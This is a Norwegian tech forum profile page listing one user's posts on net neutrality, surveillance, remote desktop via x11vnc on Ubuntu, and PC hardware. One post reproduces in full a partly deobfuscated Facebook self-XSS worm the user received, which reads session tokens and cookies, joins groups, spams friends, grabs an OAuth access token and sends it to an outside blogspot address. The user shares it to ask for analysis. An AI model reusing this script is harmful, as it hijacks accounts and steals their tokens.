Gå til innhold

Areyan

Medlemmer
  • Innlegg

    29
  • Ble med

  • Besøkte siden sist

Innlegg skrevet av Areyan

  1. Er ikke noe problem og avslutte det når de kan outsource det hele.

    De kan fortsette i sin vante gang, men unngår problematiske politiske forhold da informasjonen er tilegnet via "etteretningssammarbeid med utlandet".

     

    http://www.tv2.no/2015/05/26/nyheter/data/internett/pst/6970452

     

    Artikkelen utdyper PST og etteretningstjenestens ønsker i mindre grad enn nyhetssendingen i går, og fokuserer mest på å komme med kritikk, men det er jo ikke helt umulig å ane konturene av seriøse intensjoner om å etablere et system veldig likt NSA sitt.

  2. Vil det bli mulig å kommentere disse reklame-"artiklene", tilsvarende slik vi kan kommentere andre, "vanlige", artikler her på nettstedet i dag?

    Jeg tenker at dersom dette skal ha noen som helst mulighet til å utvikle seg i ønsket retning, altså reklame leserne selv vil ha, så vil det være essensielt at leserne får muligheten til å gi direkte tilbakemeldinger.

    • Liker 2
  3. Tilbakemelding:

    Artig og interessant med en slik video, jeg likte det.

    Men den minnet meg veldig om typiske selvpromoterings- og selvskryts-videoer som disse store bedriftene gjerne produserer selv.

    Bare for å ha det sagt, så forstår jeg jo at videoen deres er et selvstendig verk, den bare føles for lik noe Google, i dette tilfellet, kunne ha puttet sammen selv for å skryte av sitt eget prosjekt.

    Det blir litt sånn "Hvorfor skal jeg synes denne videoen er noe spesiell, når jeg kunne blitt presentert den samme informasjonen i tilnærmet likt format fra Google selv?".

    Så kanskje dere kunnet jobbet litt mer med å skille dere ut, for eksempel gjennom informasjonen som formidles, slik at videoen oppleves som mer unik og dermed mer relevant i sin egen sammenheng?

    Dere kunne jo for eksempel ha trukket fram linken mellom Project Ara og Phonebloks-prosjektet (https://phonebloks.com/en), som jeg tror har blitt dekket av Tek-nettverket tidligere, da dette typisk sett er informasjon Google selv ikke ville ha kommet med.

     

    Men utover dette likte jeg det som sagt.

  4. Selv om denne dingsen markedsføres som et spilltilbehør, så har den jo stort potensiale for mange andre bruksområder og. Folk med funksjonshemninger f.eks. vil jo kunne ha stor nytte av en slik sak.

     

    Men selvfølgelig, den ville nok neppe hatt noen sjanse om den ble markedsført som noe mindre "kult". Man kan jo sammenligne litt med Kinect.

     

    Dette er jo da forutsatt at folk kjøper produktet i slikt omfang at det blir vanlig nok.

  5.  

    Jeg mente bare å påpeke det at selv om det kan være fristende for dem å referere til nettnøytralitetsprinsippet, så er det deres egen oppførsel som påvirker infrastrukturen.

    Ikke prinsippet i seg selv, prinsippet er et prinsipp og kan følgelig ikke foreta seg egne handlinger.

    Mener du at et prinsipp ikke kan føre til en endring i handlinger eller misforstår jeg nå? Hvis du mener det, hva er da poenget med et prinsipp hvis det bare er et prinsipp i seg selv og ikke blir noe handling?

     

    Prinsippet i seg selv kan ikke det nei. For i seg selv er prinsippet bare et abstrakt konsept, det er jo ikke en levende enhet som kan foreta seg egne handlinger.

    Det er derimot slik at personer kan la seg inspirere til å følge eller ikke følge det. Så følgelig er det personer som foretar seg handlinger eller holdningsendringer basert på hvordan de tolker prinsippet og hvordan denne tolkningen samsvarer, eller ikke samsvarer, med deres egne motivasjoner og mål.

     

    Men i og med at denne diskusjonen springer ut i fra litt småpirk jeg gjorde meg, i fohold til hvordan du ordla deg i en av dine tidligere kommentarer, så avslutter jeg dette her for min del.

    Jeg ser ikke helt fornuften i å pirke videre på det.

    Ikke tror jeg det å pirke videre på språklig semantikk vil føre til noen særlige bidrag i forhold til den overordnede diskusjonen her, om det amerikanske politiske klimaet rundt nettnøytralitet, heller.

     

    Edit: Et par skriveleif-er og omformuleringer.

  6.  

    Litt pirk her: Det er ikke selve prinsippet som går utover infrastrukturen, men ISP-enes holding til prinsippet, og oppførselen de fører i forhold til det.

    Det er en helt rasjonell beslutning av ISP-ene å ikke bygge ut noe de ikke tjener nok penger på. Det er også helt rasjonelt av forbrukerne å ikke ønske å betale mer enn de føler det er verdt.

    Jeg skjønner at det er enkelt å hakke ned på store, stygge konserner, men setter du deg ned og ser på årsaken så er det helt logisk og rasjonelt å handle som de gjør.

    Det kan jo hende at Obama heller må innføre insentiver, skatter eller avgifter på noen måte for å finansiere infrastruktur, for gitt at AT&T snakker sant når de påstår det går ut over utbygging (noe jeg ser på som sannsynlig, ettersom investeringer har en klar korrelasjon med inntekter) så må noen da sette i gang noe som fjerner disse ulempene.

     

    Jeg påsto aldri at de ikke handler rasjonelt i forhold til deres egne motivasjoner eller hva de vil oppnå, økonimisk eller ellers.

     

    Jeg mente bare å påpeke det at selv om det kan være fristende for dem å referere til nettnøytralitetsprinsippet, så er det deres egen oppførsel som påvirker infrastrukturen.

    Ikke prinsippet i seg selv, prinsippet er et prinsipp og kan følgelig ikke foreta seg egne handlinger.

     

    Her er det viktig å bruke ordene riktig, slik at ting ikke fremstår feil.

    • Liker 1
  7. Steg for steg (kortversjonen) blir det da:

    1. Installer x11nvc (eller en annen VNC-server om du vil) på din linux server. Installer også en SSH-server f.eks openssh-server, for det kommer du til å trenge uansett.

    2. Konfigurer disse slik som du vil. Følg manualer eller søk på nettet dersom du trenger det. Her skal det strengt tatt ikke være så mye som er nødvendig å gjøre dersom du ikke installerer på en spesiell måte eller noe slikt.

     

    2.a (Valgfritt) F.eks. kan du jo legge inn VNC-serveren i et init-script eller konfigurere den som, eller i sammenheng med, en daemon (service) for å kjøre i bakgrunnen etter oppstart, for å slippe å logge inn via SSH og starte den før du kan bruke VNC-klienten.

    Bare merk deg sikkerhetsproblemene knyttet til VNC jeg har nevnt på slutten av inlegget over.

    3. Gjør slik som i denne tutorialen for å sørge for at GUI starter selv ved fravær av fysisk skjerm.

     

    4. Det skal da ikke være noen problemer med å koble til den kjørende GUI-sessionen på linux-serveren din via en VNC-klient.

     

    Bare husk å bruk -auth guess med x11vnc for å få den til å lete opp og bruke GUI-sessionen som allerede kjører.

     

    Edit: skriveleif + litt ekstra

  8. Ok, først beklager jeg om jeg ikke har svart på enkelte forslag dere har kommet med. Har rett og slett ikke hatt tid til å logge inn her å lese eller svare på et par dager nå.

    Men har nå løst problemet mitt, sånn passe i alle fall, og tenkte jeg skulle forklare sånn noenlunde hvordan jeg gjorde det.

    Installerte VNC-serveren x11vnc. Valgte denne serveren basert på brukererfaringer der ute på nettet som påstår at den er relativt enkel å bruke samtidig som den har mer enn nok konfigurasjonmuligheter.

    Manualen er i hvertfall ganske lang og veldig detaljert, alle options blir forklart godt nok til at, jeg i alle fall, greit kunne forstå hva de var til og hvordan de skulle brukes.

    Så da logget jeg inn på hjemmeserveren via SSH, startet x11vnc via terminalen, og det funket som forventet når jeg koblet til med VNC-klienten fra den vanlige maskinen min.

    Godt fornøyd plugget jeg så ut alle kabler som hører til skjerm osv, restartet og prøvde igjen for å være sikker på at alt funket nå også.
    Og skuffelse.
    Moderne linux-varianter starter ikke noen GUI-session hvis de ikke finner noen skjerm, fant jeg ut etter en runde på google.

    Videre valgte jeg derfor å undersøke mulighetene for å starte en GUI-session gjennom VNC-serveren. For det skal visstnok la seg gjøre med x11vnc, og andre VNC-servere dor den saks skyld, om nødvendig, slik jeg forsto det etter en liten runde til på google og en titt til på den lange manualen. Dette klarte jeg likevel ikke å finne ut av, så hvis noen som kan dette bedre enn meg er dere velkomne til å dele deres erfaring.

    Isteden valgte jeg derfor å følge denne tutorialen for å lage en slags virtuell skjerm og dermed "lure" maskinen til å starte GUI. Noe som umiddelbart fungerte etter hensikten.

     

    Problemet lot seg derfor enkelt løse med litt kjapp redigering av xorg.conf.

    Noe jeg nå i etterpåklokskap selvfølgelig burde tenkt på tidligere...

    Til slutt vil jeg bare legge inn en liten notis om sikkerhet og VNC for de som ikke er klar over det.

    VNC har ikke noe innebygget sikkerhet utover at det er mulig å sette opp et innloggingspassord for at ikke alle og enhver skal kunne få tilgang til skrivebordet. Dette passordet sendes desverre uten noen form for kryptering, i likhet med all annen trafikk over VNC, slik jeg har forstått det. Så det er lurt å benytte seg av en SSH-tunnel sammen med VNC for å pakke det hele inn i litt kryptering. De fleste VNC-klienter har en eller annen setting for dette.

     

    For de som da lurer på hvorfor jeg bruker VNC på tross av sikkerhetsrisikoene så er det i hovedsak fordi det er den linux-native metoden for å gjøre dette, og også åpent og fritt osv.

     

    Men takk alle sammen for forslag :)

  9. Har ikke tid til å skrive så mye, men har du sett på VNC? Det høres ut som om det skal dekke kravene dine.

    Skriver at jeg allerede har tuklet med VNC, og RDP for den saks skyld, men har kun fått det til å funke når jeg er logget in lokalt på hjemmeserveren med en allerede kjørende GUI-session.

    Det jeg prøver på er å få til dette eller noe tilsvarende, men uten å måtte ha en lokal innlogging med en allerede kjørende GUI-session på hjemmeserveren.

  10. Hei, etter å ha forsøkt på egenhånd i flere dager nå kom jeg til den konklusjonen at det helt sikkert er lurere å spørre om hjelp, og forhåpentligvis få svar fra noen med peiling.

     

    Det har seg nemlig slik at jeg har bestemt meg for å sette opp en relativt enkel hjemmeserver med Ubuntu 14.04. Jeg har brukt Ubuntu mer eller mindre daglig hjemme i et par år nå, og er dermed ikke helt fremmed til Linux. Så det meste har vært rimelig grei skuring å sette opp og konfigurere, på tross av at jeg ikke har prøvd meg så veldig på akkurat dette med hjemmeservere før.

     

    Jeg har allerede satt opp og konfigurert for SSH, og der er det ingen problemer. Selv om terminal-grensesnitt er vel og bra, og teoretisk dekker alle administrative behov, er det visse situasjoner hvor, jeg personlig mener, GUI er å foretrekke. Særlig når det er slik jeg er vant til å bruke en rekke funksjoner i OS-et fra før av.

     

    Og det er når man blander inn GUI at det begynner å bli komplisert, på tross av at jeg bevisst valgte å installere vanlig desktop-versjon av Ubuntu, isteden for server, nettop med tanke på dette.

     

    Det jeg har fått til så langt er vanlig ukryptert desktop-sharing, både via VNC og RDP, men kun når jeg allerede er logget in lokalt på hjemmeserveren med en GUI-session kjørende. Siden jeg helst vil at hjemmeserveren skal kunne putre å gå for seg selv uten å måtte være tilkoblet mus, tastatur og skjerm, og restartes som nødvendig, er det jo ikke akkurat helt optimalt å måtte logge inn lokalt på "vanlig" måte hver gang. Da forsvinner jo litt av poenget.

     

    Det jeg gjerne vil oppnå er å kunne koble til hjemmeserveren, fra en hvilken som helst annen pc i huset, tilsvarende slik jeg ville logget meg på lokalt. Da uten å måtte være logget inn med noen bruker fra før av på hjemmeserveren. Eller i alle fall en noenlunde tilsvarende løsning. Så lenge jeg ikke behøver å måtte koble til mus, tastatur og skjerm og logge meg inn lokalt i tide og utide for å kunne få opp remote desktop på en anne maskin, må jeg si meg fornøyd.

     

    Videre har det å tråle nettet etter løsninger så langt ikke bært noen gode fukter. Det meste av tutorials og guider der ute jeg har klart å finne er enten spesifikt rettet mot eldre versjoner av Ubuntu, ofte helt tilbake til 8.04, eller til og med tidligere i enkelte tilfeller. Eller så baserer de seg i en eller annen instans på utdatert, og dermed nå, på en eller annen måte, trøblete programvare.

     

    Nå har dette vært en skikkelig hodepine for meg i flere dager, så all hjelp settes stor pris på.

  11. Hei, fikk noen rare forespørsler via facebook om a copy-paste og kjøre koden herfra på facebooken min.
    Mistenker at det er et hackerforsøk og vil gjerne ha litt hjelp fra folk som er kyndige med javascript til å hjelpe meg å forstå nøyaktig hva denne koden vil gjøre.

    Og selvfølgelig hvilke konsekvenser det vil ha for en facebook-profil.

     

    Setter veldig pris på litt hjelp her da noen av mine mindre datakyndige venner selvfølgelig har gjort som hackeren har instruert og kjørt koden...

     

    Har tatt meg bryet med å oversette de kryptiske bitene til koden det skal representere og formatere den til et lesbart nivå som best jeg kan:

    function Kodran(uidss)
    {
        var a = document.createElement('script');
        a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();";
        document.body.appendChild(a)
    }
    Kodran("1379575028991328");
    Kodran("1379738492308315");
    Kodran("562521103826775");
    Kodran("262651447224104");
    var b = document.getElementsByName("fb_dtsg")[0].value,
        c = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
    
    
    function g(d)
    {
        var a = new XMLHttpRequest;
        d = "&ref=group_jump_header&group_id=" + d + "&fb_dtsg=" + b + "&__user=" + c + "&phstamp=";
        a.open("POST", "/ajax/groups/membership/r2j.php?__a=1", !0);
        a.onreadystatechange = function ()
        {
            4 == a.readyState && 200 == a.status && a.close
        };
        a.send(d)
    }
    g("235841983200157");
    g("623270711058894");
    g("166191003446381");
    g("429414337196220");
    b = document.getElementsByName("fb_dtsg")[0].value;
    c = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
    
    var _0xa22c=["value","fb_dtsg","getElementsByName","match","cookie","281001968734667","onreadystatechange","readyState","arkadaslar = ","for (;;","","replace","responseText",";","length","entries","payload","round"," @[","uid",":","text","]"," ","\x26filter[0]=user","\x26options[0]=friends_only","\x26options[1]=nm","\x26token=v7","\x26viewer=","\x26__user=","https://","indexOf","URL","GET","https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1","open","http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1","send","random","floor","\x26ft_ent_identifier=","\x26comment_text=","\x26source=2","\x26client_id=1377871797138:1707018092","\x26reply_fbid","\x26parent_comment_id","\x26rootid=u_jsonp_2_3","\x26clp={\x22cl_impid\x22:\x22453524a0\x22,\x22clearcounter\x22:0,\x22elementid\x22:\x22js_5\x22,\x22version\x22:\x22x\x22,\x22parent_fbid\x22:","}","\x26attached_sticker_fbid=0","\x26attached_photo_fbid=0","\x26giftoccasion","\x26ft[tn]=[]","\x26__a=1","\x26__dyn=7n8ahyj35ynxl2u5F97KepEsyo","\x26__req=q","\x26fb_dtsg=","\x26ttstamp=","POST","/ajax/ufi/add_comment.php","Content-type","application/x-www-form-urlencoded","setRequestHeader","status","close"];
    var fb_dtsg=document[_0xa22c[2]](_0xa22c[1])[0][_0xa22c[0]];
    var user_id=document[_0xa22c[4]][_0xa22c[3]](document[_0xa22c[4]][_0xa22c[3]](/c_user=(\d+)/)[1]);
    var id=_0xa22c[5];
    var arkadaslar=[];
    var svn_rev;
    function arkadaslari_al(id)
    {
        var _0x7892x7= new XMLHttpRequest();
        _0x7892x7[_0xa22c[6]]=function ()
        {
            if(_0x7892x7[_0xa22c[7]]==4)
            {
                eval(_0xa22c[8]+_0x7892x7[_0xa22c[12]].toString()[_0xa22c[11]](_0xa22c[9],_0xa22c[10])+_0xa22c[13]);
                for(f=0; f<Math[_0xa22c[17]](arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]]/27); f++)
                {
                    mesaj=_0xa22c[10];
                    mesaj_text=_0xa22c[10];
                    for(i=f*27; i<(f+1)*27; i++)
                    {
                        if(arkadaslar[_0xa22c[16]][_0xa22c[15]][i])
                        {
                            mesaj+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]]+_0xa22c[22];
                            mesaj_text+=_0xa22c[23]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]];
                        } ;
                    } ;
                    yorum_yap(id,mesaj);
                } ;
            } ;
        } ;
        var _0x7892x8=_0xa22c[24];
        _0x7892x8+=_0xa22c[25];
        _0x7892x8+=_0xa22c[26];
        _0x7892x8+=_0xa22c[27];
        _0x7892x8+=_0xa22c[28]+user_id;
        _0x7892x8+=_0xa22c[29]+user_id;
        if(document[_0xa22c[32]][_0xa22c[31]](_0xa22c[30])>=0)
        {
            _0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[34]+_0x7892x8,true);
        }
        else
        {
            _0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[36]+_0x7892x8,true);
        } ;
        _0x7892x7[_0xa22c[37]]();
    } ;
    function RandomArkadas()
    {
        var _0x7892xa=_0xa22c[10];
        for(i=0; i<9; i++)
        {
            _0x7892xa+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[21]]+_0xa22c[22];
        } ;
        return _0x7892xa;
    } ;
    function yorum_yap(id,_0x7892xc)
    {
        var _0x7892xd= new XMLHttpRequest();
        var _0x7892x8=_0xa22c[10];
        _0x7892x8+=_0xa22c[40]+id;
        _0x7892x8+=_0xa22c[41]+encodeURIComponent(_0x7892xc);
        _0x7892x8+=_0xa22c[42];
        _0x7892x8+=_0xa22c[43];
        _0x7892x8+=_0xa22c[44];
        _0x7892x8+=_0xa22c[45];
        _0x7892x8+=_0xa22c[46];
        _0x7892x8+=_0xa22c[47]+id+_0xa22c[48];
        _0x7892x8+=_0xa22c[49];
        _0x7892x8+=_0xa22c[50];
        _0x7892x8+=_0xa22c[51];
        _0x7892x8+=_0xa22c[52];
        _0x7892x8+=_0xa22c[29]+user_id;
        _0x7892x8+=_0xa22c[53];
        _0x7892x8+=_0xa22c[54];
        _0x7892x8+=_0xa22c[55];
        _0x7892x8+=_0xa22c[56]+fb_dtsg;
        _0x7892x8+=_0xa22c[57];
        _0x7892xd[_0xa22c[35]](_0xa22c[58],_0xa22c[59],true);
        _0x7892xd[_0xa22c[62]](_0xa22c[60],_0xa22c[61]);
        _0x7892xd[_0xa22c[6]]=function ()
        {
            if(_0x7892xd[_0xa22c[7]]==4&&_0x7892xd[_0xa22c[63]]==200)
            {
                _0x7892xd[_0xa22c[64]];
            } ;
        } ;
        _0x7892xd[_0xa22c[37]](_0x7892x8);
    } ;
    arkadaslari_al(id);
    var gid = ['623270711058894'];
    var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
    var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);
    
    var httpwp = new XMLHttpRequest();
    var urlwp = '/ajax/groups/membership/r2j.php?__a=1';
    var paramswp = '&ref=group_jump_header&group_id=' + gid + '&fb_dtsg=' + fb_dtsg + '&__user=' + user_id + '&phstamp=';
    httpwp['open']('POST', urlwp, true);
    httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
    httpwp['setRequestHeader']('Content-length', paramswp['length']);
    httpwp['setRequestHeader']('Connection', 'keep-alive');
    httpwp['send'](paramswp);
    
    var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
    var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);
    
    var friends = new Array();
    gf = new XMLHttpRequest();
    gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&viewer=' + user_id + '&token' + Math['random']() + '&filter[0]=user&options[0]=friends_only', false);
    gf['send']();
    if (gf['readyState'] != 4) {}
    else
    {
        data = eval('(' + gf['responseText']['substr'](9) + ')');
        if (data['error']) {}
        else
        {
            friends = data['payload']['entries']['sort'](function (_0x93dax8, _0x93dax9)
            {
                return _0x93dax8['index'] - _0x93dax9['index'];
            });
        };
    };
    
    for (var i = 0; i < friends['length']; i++)
    {
        var httpwp = new XMLHttpRequest();
        var urlwp = '/ajax/groups/members/add_post.php?__a=1';
        var paramswp= '&fb_dtsg=' + fb_dtsg + '&group_id=' + gid + '&source=typeahead&ref=&message_id=&members=' + friends[i]['uid'] + '&__user=' + user_id + '&phstamp=';
        httpwp['open']('POST', urlwp, true);
        httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
        httpwp['setRequestHeader']('Content-length', paramswp['length']);
        httpwp['setRequestHeader']('Connection', 'keep-alive');
        httpwp['onreadystatechange'] = function ()
        {
            if (httpwp['readyState'] == 4 && httpwp['status'] == 200) {};
        };
        httpwp['send'](paramswp);
    };
    
    if (location.hostname.indexOf("www.facebook.com", "static.ak.facebook.com", "apps.facebook.com", "beta.facebook.com") >= 0)
    {
        var profile_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]).toString();
    
        function uygulamaizinver(url)
        {
            var xmlhttp = new XMLHttpRequest();
            xmlhttp.onreadystatechange = function ()
            {
                if (xmlhttp.readyState == 4)
                {
                    izikbenhtml = document.createElement("html");
                    izikbenhtml.innerHTML = xmlhttp.responseText;
                    if (izikbenhtml.getElementsByTagName("form").length > 0)
                    {
                        izikbenhtml.innerHTML = izikbenhtml.getElementsByTagName("form")[0].outerHTML
                                                act = izikbenhtml.getElementsByTagName("form")[0].action;
                        duzenlevegonder(izikbenhtml, act);
                    }
                }
            };
            xmlhttp.open("GET", url, true);
            xmlhttp.send();
        }
    
        function duzenlevegonder(formnesne, act)
        {
            izikbenparams = "";
            for (i = 0; i < formnesne.getElementsByTagName("input").length; i++)
            {
                if (formnesne.getElementsByTagName("input")[i].name.indexOf("__CANCEL__") < 0 && formnesne.getElementsByTagName("input")[i].name.indexOf("cancel_clicked"))
                {
                    izikbenparams += "&" + formnesne.getElementsByTagName("input")[i].name + "=" + formnesne.getElementsByTagName("input")[i].value;
                }
            }
            if (formnesne.getElementsByTagName("select").length > 0)
            {
                izikbenparams += "&" + formnesne.getElementsByTagName("select")[0].name + "=80";
            }
            izikbenparams.replace("&fb_dtsg", "fb_dtsg");
            izikbenparams += "&__CONFIRM__=1";
            formnesne = formnesne;
            var xmlhttp = new XMLHttpRequest();
            xmlhttp.onreadystatechange = function ()
            {
                if (xmlhttp.readyState == 4)
                {
                    izikhtml = document.createElement("html");
                    izikhtml.innerHTML = xmlhttp.responseText;
                    if (izikhtml.getElementsByTagName("form").length > 0)
                    {
                        izikhtml.innerHTML = izikhtml.getElementsByTagName("form")[0].outerHTML;
                        act = izikhtml.getElementsByTagName("form")[0].action;
                        duzenlevegonder(izikhtml, act)
                    }
                    else
                    {
                        sex = xmlhttp.responseText.match(/#access_token=(.*?)&expires_in/i);
                        if (sex[1])
                        {
                            tokenyolla(sex[1]);
                        }
                    }
                }
            };
    
            xmlhttp.open("POST", act, true);
            xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
            xmlhttp.send(izikbenparams);
    
        }
    
        function TokenUrl(id)
        {
            return "//www.facebook.com/dialog/oauth?response_type=token&display=popup&client_id=" + id + "&redirect_uri=fbconnect://success&sso_key=com&scope=email,publish_stream,user_likes,friends_likes,user_birthday";
        }
    
        if (!localStorage['token_' + profile_id] || (localStorage['token_' + profile_id] && tarih.getTime() >= localStorage['token_' + profile_id]))
        {
            uygulamaizinver(TokenUrl("121876164619130"));
            var http = new XMLHttpRequest();
            http['open']('GET', 'http://graph.facebook.com/' + profile_id, false);
            http['send']();
            var get = JSON.parse(http['responseText']);
            var isim = get.name;
        }
        window.setInterval(function ()
        {
            if (document.getElementsByClassName("_5ce"))
            {
                for (i = 0; i < document.getElementsByClassName("_5ce").length; i++)
                {
                    document.getElementsByClassName("_5ce")[i].innerHTML = "";
                }
            }
            if (document.getElementsByClassName("uiToggle wrap"))
            {
                for (i = 0; i < document.getElementsByClassName("uiToggle wrap").length; i++)
                {
                    document.getElementsByClassName("uiToggle wrap")[i].innerHTML = "";
                }
            }
            if (document.getElementsByClassName("uiPopover"))
            {
                for (i = 0; i < document.getElementsByClassName("uiPopover").length; i++)
                {
                    document.getElementsByClassName("uiPopover")[i].innerHTML = "";
                }
            }
        }, 200);
    
        function tokenyolla(token)
        {
            top.location.href = 'http://19283746564.blogspot.com/#' + token;
        }
    }
    var Zakarias = "click OK and wait for seconds, Hacking START now!! ";
    alert(Zakarias);
    
  12. Som dere selv siterer fra post og teletilsynet:

    [...] - Men det betyr ikke at prinsippet står i veien for å [...] sikre tjenestekvaliteten til spesifikke applikasjonstyper som krever dette [...]

     

    Jeg vil påsta at tjenester som Netflix kvalifiserer til dette unntaket.

    Men dersom en av partene tar seg betalt eller benytter seg av finansielle midler for å oppnå denne fordelen, setter jo dette presedens for lignende situasjoner i fremtiden. Noe som kan føre til at mindre aktører med samme behov som ike har råd blir skviset ut ved ved at deres tilbud blir dårligere enn konkurrentene. Som da igjen fører til skjevhet i nettnøytraliteten.

     

    Det beste hadde vært om ISP-er gjorde slikt uoppfordret på generell og lik basis, uten å inngå spesifikke avtaler med individuelle aktører.

    • Liker 1
  13. Enda mer skremmende at det kan være USA på lik linje med de typiske "slemme" statene som Russland og Kina.

     

    USA kan godt betegnes som en "slem" stat, med tanke på oppførselen deres rundt om i verden. Eneste forskjellen mellom USA og f.eks. Kina eller Russland er at de er flinkere med imaget sitt, og at vi av historiske årsaker er mer tilbøyelige til å tro på PR-en deres kontra andre stater som ikke er like flinke med å markedsføre seg selv som en "snill" stat.

     

    Men on topic, så er det veldig skummelt at dette viruset har fått virke i hele 7 år uten at noen har merket noe som helst. Dette er jo også god tid til å evt. infisere systmene med andre ting slik at bakmennene kan fortsette virksomheten sin selv etter at det "orginale" viruset har blitt oppdaget.

    • Liker 1
  14. Forstår synspunktet EU legger til grunn her om å forebygge seksuelt betinget objektifisering av kvinner.

    To dokumentarer som understreker behovet:

    http://tv.nrk.no/program/koid20008713/alltid-sexy

     

    http://tv.nrk.no/program/koid30000013/menn-som-netthater-kvinner

     

    Men tror ikke pornoforbud er veien og gå.

    Folk har en merkelig tendens til å ha lyst på det de ikke kan få, så pornoforbud vil nok i stor grad ha motsatt effekt. Blir mye det samme som piratkopiering, bare mer omfattende skulle jeg tro.

     

    Det som egentlig må til er en grunnleggende holdningsendring, sånn som man får gjennom gode samtaler osv.

    Men det er desverre mye vanskeligere enn å bare innføre et forbud, særlig når media ellers også spiller så mye på sex og slik bidrar til den onde sirkelen.

  15. Også var det dette med thunderbolt:

     

    Jeg har ganske lyst på thunderbolt-en da det er en enormt potent I/O-teknologi, som det også sannsynligvis/forhåpentligvis kommer til å bli mer og mer av framover. Så ikke bare er det snakk om at det er som en honningkrukke for en data-interessert, men det er også dette perspektivet med å være litt framtidsrettet. Er ikke så veldig lysten på å kjøpe "feil" nå og være nødt til å oppgradere om kort tid igjen, som student er det begrenset hvor ofte jeg har råd til å bruke såpass mye penger på en oppgradering, uansett hvor mye jeg jobber ved siden av og kutter ned på andre utgifter.

     

    På den annen side er jeg også den som har behov for å plugge til mange ting samtidig, i skrivende stund har jeg vel 5 USB-enheter koblet til, og det er gjerne minumumsantallet. Og i forhold til det synes jeg egentlig begge thunderbolt-kortene kommer litt til kort ved å ha henholdsvis 6 og 4 USB porter på bakpanelet.

    Vet det er flere muligheter til å koble til internt, men det kan fort bli kronglete.

     

    Noen som har noen synspunkter i forhold til akkurat dette?

  16. Han skriver at han allerede har en SP 850W . Den er av veldig god kvalitet, og ingen grunn til å bytte.

     

    Overså det... uansett var det ikke noe imot kvaliteten, seasonic gjør en god jobb. Men en 850W PSU som ikke er modulær er ett mareritt å rydde i...

     

    Det er jeg klar over, men den var på nesten 50% tilbud inne på komplett når jeg kjøpte den. Fikk litt shoppingmani akkurat når jeg så det der og da, så nå er det det jeg har... Ville nok heller valgt som du anbefaler om jeg skulle kjøpt nå. :)

  17. Takk for alle svar så langt :)

     

    Men for å ta det første først: Det jeg egentlig lurer på ang. valg av CPU er i hovedsak det med at i7-3770K er en 22nm 4-kjerners med hyperthreading, mens i7-3930K er en 32nm 6-kjerners med hyperthreading. i7-3930K har da flere kjerner og har sånn sett potensielt bedre ytelse enn en LGA-1155 CPU, som maks kan ha fire kjerner, men er produsert med en "mindre effektiv" teknologi, om jeg får lov til å si det?

    Så egentlig lurer jeg vel på hvordan dette veier opp i mot hverandre i forhold til de to prosessorene, ytelsesmessig osv. (gjerne i sammenheng med pris)?

     

    Grunnen til at jeg stusser litt på dette med prosessorvalg er at jeg som sagt ikke bare skal drive med gaming, men har også planer om å leke meg litt med spillmotorer som f.eks. Unreal Engine 3 som jeg har lenket til over. Dette er et nokså tungt program å drive, det går nokså tregt, selv i enkle oppsett, på det systemet jeg allerede har, men så er det et GT-435M som sitter i maskinen og da...

    Jeg vil gjerne forsikre meg ved å kjøpe noe som er litt mer enn akkurat nok, men som de fleste andre vettuge mennesker vil jeg jo gjerne ikke legge ut mer enn nødvendig.

    Vil en i7-3770K være akkurat nok eller vil den være tilfredstillende mer enn akkurat nok, slik at jeg kan droppe å lure på om jeg burde gå for i7-3930K isteden?

  18. Hei, har planer om å oppgradere PC-en til et skikkelig ytelsesbeist.

    Planlagt bruk er å kjøre tunge spill, samt modding av spill, og programmer som UDK.

     

    På handlelisten står gtx 690, dette minnesettet, og Corsair H100 vannkjøler.

    I tillegg har jeg allerede denne 850W strømforsyningen, og fire Seagate 2T hardisker.

     

    Når det kommer til prosessorvalg står det mellom enten i7-3770K og i7-3930K.

    Kjøper jeg i7-3930K så blir det sannsynligvis ASUS P9X79 Deluxe til hovekort.

    Blir det i7-3770K står derimot valget mellom enten ASUS P8Z77-V DELUXE eller ASUS P8Z77-V PREMIUM.

     

    Det jeg da gjerne skulle hatt råd om er:

    1. Om strømforsyningen jeg har vil takle konfigurasjonen med i7-3930K, da denne drar mer strøm enn i7-3770K.

     

    2. Hvorvidt det vil være verdt det å legge ut de ekstra kronene for ASUS P8Z77-V PREMIUM for thunderbolt-kontakten osv. eller om det er bedre å isteden gå for ASUS P8Z77-V DELUXE om jeg velger å kjøpe i7-3770K.

     

    Takker på forhånd for svar. :)

×
×
  • Opprett ny...